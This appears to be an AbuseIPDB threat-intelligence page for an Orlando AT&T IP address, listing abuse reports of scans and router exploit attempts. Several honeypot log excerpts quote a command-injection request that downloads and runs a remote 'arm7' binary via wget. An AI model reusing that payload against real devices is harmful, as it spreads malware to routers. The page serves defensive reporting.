JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 172.2.5.212

172.2.5.212 was found in our database!

This IP was reported 181 times. Confidence of Abuse is 100%: ?

100%

ISP	AT&T Enterprises, LLC
Usage Type	Fixed Line ISP
ASN	AS7018
Hostname(s)	172-2-5-212.lightspeed.dybhfl.sbcglobal.net
Domain Name	att.com
Country	🇺🇸 United States of America
City	Orlando, Florida

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 172.2.5.212

Whois 172.2.5.212

IP Abuse Reports for 172.2.5.212:

This IP address has been reported a total of 181 times from 96 distinct sources. 172.2.5.212 was first reported on December 5th 2025, and the most recent report was 2 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇫🇷 Version Net	2026-06-11 12:09:40 (2 hours ago)	IPS Detection: D-Link.DSL-2750B.CLI.OS.Command.Injection	Hacking
🇩🇪 Progetto1	2026-06-11 10:44:02 (4 hours ago)	Detected via HAProxyScanner at 2026-06-11 10:44:02 UTC on destination port WEB (80/443). Repeated sc ... show more Detected via HAProxyScanner at 2026-06-11 10:44:02 UTC on destination port WEB (80/443). Repeated scan / connection. show less	Port Scan Hacking Brute-Force
🇩🇪 HoneyPot-FrPri	2026-06-11 03:02:51 (11 hours ago)	172.2.5.212 - - [11/Jun/2026:05:02:50 +0200] "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37 ... show more 172.2.5.212 - - [11/Jun/2026:05:02:50 +0200] "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27/&sessionKey=1039 HTTP/1.1" 40 ... show less	Bad Web Bot Web App Attack
🇨🇭 SOC [GOLINE SA]	2026-06-11 00:04:48 (14 hours ago)	FortiGate detected IPS attack from IPv4 address 172.2.5.212	Hacking
🇬🇧 PeravixGroup	2026-06-10 22:38:18 (16 hours ago)	Honeypot detection: Generic remote code execution / reverse shell attempt on port 5555. Severity: CR ... show more Honeypot detection: Generic remote code execution / reverse shell attempt on port 5555. Severity: CRITICAL. Aaran.cloud show less	Hacking Web App Attack
🇸🇪 adaml1324	2026-06-10 18:30:19 (20 hours ago)	Web application exploit probing From server logs: 2026-06-10 11:02:06 (direkt-IP) GET /login.cgi? ... show more Web application exploit probing From server logs: 2026-06-10 11:02:06 (direkt-IP) GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7; [400 Bad Request] UA: r00ts3c show less	Web App Attack
🇳🇱 COMPLEX	2026-06-10 01:04:16 (1 day ago)	Unsolicited TCP traffic \| Action: DROP \| Port 80	Port Scan
🇨🇭 SOC [GOLINE SA]	2026-06-10 00:03:57 (1 day ago)	FortiGate detected IPS attack from IPv4 address 172.2.5.212	Hacking
🇭🇺 HoneyPotEu	2026-06-09 21:16:54 (1 day ago)	172.2.5.212 - - _ [09/Jun/2026:23:16:39 +0200] "GET /ping.cgi?pingIpAddress=google.fr;wget%20http:// ... show more 172.2.5.212 - - _ [09/Jun/2026:23:16:39 +0200] "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27/&sessionKey=1039 HTTP/1.1" 400 150 "-" "r00ts3c" 0.000 - - ... show less	Bad Web Bot Web App Attack
🇺🇸 gu-alvareza	2026-06-09 07:05:30 (2 days ago)	D-Link.DSL-2750B.CLI.OS.Command.Injection	SQL Injection Web App Attack
🇨🇭 SOC [GOLINE SA]	2026-06-09 00:03:15 (2 days ago)	FortiGate detected IPS attack from IPv4 address 172.2.5.212	Hacking
🇺🇸 MPL	2026-06-08 21:15:06 (2 days ago)	tcp/80	Port Scan
🇹🇭 Sawasdee	2026-06-08 09:27:05 (3 days ago)	Unwanted checking 80 or 443 port ...	Bad Web Bot
🇮🇪 RoboSOC	2026-06-07 21:20:12 (3 days ago)	Comtrend VR-3033 Remote Command Execution Vulnerability, PTR: 172-2-5-212.lightspeed.dybhfl.sbcgloba ... show more Comtrend VR-3033 Remote Command Execution Vulnerability, PTR: 172-2-5-212.lightspeed.dybhfl.sbcglobal.net. show less	Hacking
🇺🇸 MPL	2026-06-06 06:04:00 (5 days ago)	tcp/37215	Port Scan

Showing 1 to 15 of 181 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇳🇱 195.178.110.30

🇨🇳 180.76.194.91

🇺🇸 162.216.149.234

🇧🇷 148.227.123.242

🇨🇳 120.27.147.82

🇺🇸 107.150.105.153

🇵🇹 87.196.72.235

🇺🇸 65.49.1.38

🇭🇰 45.142.154.100

🇺🇸 40.124.175.103

🇸🇪 20.240.241.205

🇩🇪 209.38.209.207

🇺🇸 209.38.134.32

🇵🇱 194.180.48.31

🇷🇴 193.32.162.16

🇩🇪 172.217.33.220

🇻🇳 171.224.180.136

🇺🇸 147.185.132.182

🇺🇸 146.190.37.241

🇮🇳 103.182.132.154